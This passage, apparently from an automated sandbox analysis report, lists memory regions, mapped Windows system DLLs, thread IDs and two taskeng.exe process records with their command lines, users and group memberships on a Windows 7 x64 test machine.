"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3261 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3262 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3263 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3264 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3265 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3266 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3267 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3268 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3269 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3270 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3271 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3272 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3273 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3274 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3275 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 182 os_tid = 0xa90 Thread: id = 183 os_tid = 0x684 Thread: id = 184 os_tid = 0x680 Thread: id = 185 os_tid = 0x654 Thread: id = 186 os_tid = 0x63c Thread: id = 187 os_tid = 0x614 Thread: id = 192 os_tid = 0xb48 Process: id = "26" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x42f86000" os_pid = "0x350" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x368" cmd_line = "taskeng.exe {88945FB0-7E06-44CD-A2C0-DAD18A17915A} S-1-5-18:NT AUTHORITY\\System:Service:" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2d7" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3143 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3144 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3145 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3146 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3147 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3148 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3149 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3150 start_va = 0xff4d0000 end_va = 0xff543fff entry_point = 0xff4d0000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 3151 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3152 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3153 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3154 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3155 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3156 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3157 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3158 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3159 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3160 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3161 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3162 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3163 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3164 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3165 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 3166 start_va = 0x3b0000 end_va = 0x537fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 3167 start_va = 0x540000 end_va = 0x6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3168 start_va = 0x6d0000 end_va = 0x78ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 3169 start_va = 0x790000 end_va = 0xb82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 3170 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3171 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3172 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3173 start_va = 0x7fefa810000 end_va = 0x7fefa819fff entry_point = 0x7fefa810000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 3174 start_va = 0x7fefd050000 end_va = 0x7fefd0bcfff entry_point = 0x7fefd050000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3175 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3176 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3177 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3178 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3179 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3180 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3181 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3182 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3183 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3184 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 3185 start_va = 0xb90000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 3186 start_va = 0xc80000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 3187 start_va = 0xd20000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 3188 start_va = 0xda0000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 3189 start_va = 0xe60000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 3190 start_va = 0xee0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 3191 start_va = 0xfe0000 end_va = 0x12aefff entry_point = 0xfe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3192 start_va = 0x13b0000 end_va = 0x142ffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 3193 start_va = 0x7fef60c0000 end_va = 0x7fef60c8fff entry_point = 0x7fef60c0000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 3194 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3195 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3196 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3197 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3198 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3199 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3200 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3201 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3202 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3203 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3204 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3205 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3206 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3207 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 188 os_tid = 0x744 Thread: id = 189 os_tid = 0x67c Thread: id = 190 os_tid = 0xae4 Thread: id = 191 os_tid = 0xae8 Thread: id = 196 os_tid = 0x818 Thread: id = 197 os_tid = 0xadc Thread: id = 198 os_tid = 0xaec Thread: id = 199 os_tid = 0xaf0 Thread: id = 307 os_tid = 0x330 Process: id = "27" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x4492f000" os_pid = "0xb8c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x368" cmd_line = "taskeng.exe {3DCF8ADF-47F1-4481-AEB2-3A1B63182F89} S-1-5-21-2345716840-1148442690-1481144037-1000:YKYD69Q\\aETAdzjz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3276 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3277 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3278 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 3279 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3280 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3281 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3282 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3283 start_va = 0xff4d0000 end_va = 0xff543fff entry_point = 0xff4d0000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 3284 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3285 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3286 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3287 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3288 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3289 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3290 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3315 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3316 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3317 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3318 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 3319 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3320 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3321 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3322 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3323 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 3324 start_va = 0x3a0000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 3325 start_va = 0x530000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3326 start_va = 0x6c0000 end_va = 0x1abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 3327 start_va = 0x1ac0000 end_va = 0x1eb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ac0000" filename = "" Region: id = 3328 start_va = 0x1ec0000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 3329 start_va = 0x2010000 end_va = 0x208ffff entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 3330 start_va = 0x2090000 end_va = 0x218ffff entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 3331 start_va = 0x21b0000 end_va = 0x222ffff entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 3332 start_va = 0x2350000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 3333 start_va = 0x23d0000 end_va = 0x269efff entry_point = 0x23d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3334 start_va = 0x26d0000 end_va = 0x274ffff entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 3335 start_va = 0x2780000 end_va = 0x27fffff entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 3336 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3337 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3338 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3339 start_va = 0x7fef60c0000 end_va = 0x7fef60c8fff entry_point = 0x7fef60c0000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 3340 start_va = 0x7fefa810000 end_va = 0x7fefa819fff entry_point = 0x7fefa810000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 3341 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3342 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3343 start_va = 0x7fefd050000 end_va = 0x7fefd0bcfff entry_point = 0x7fefd050000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3344 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3345 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3346 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3347 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3348 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3349 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3350 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3351 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3352 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3353 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3354 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3355 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3356 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3357 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3358 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3359 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3360 start_va = 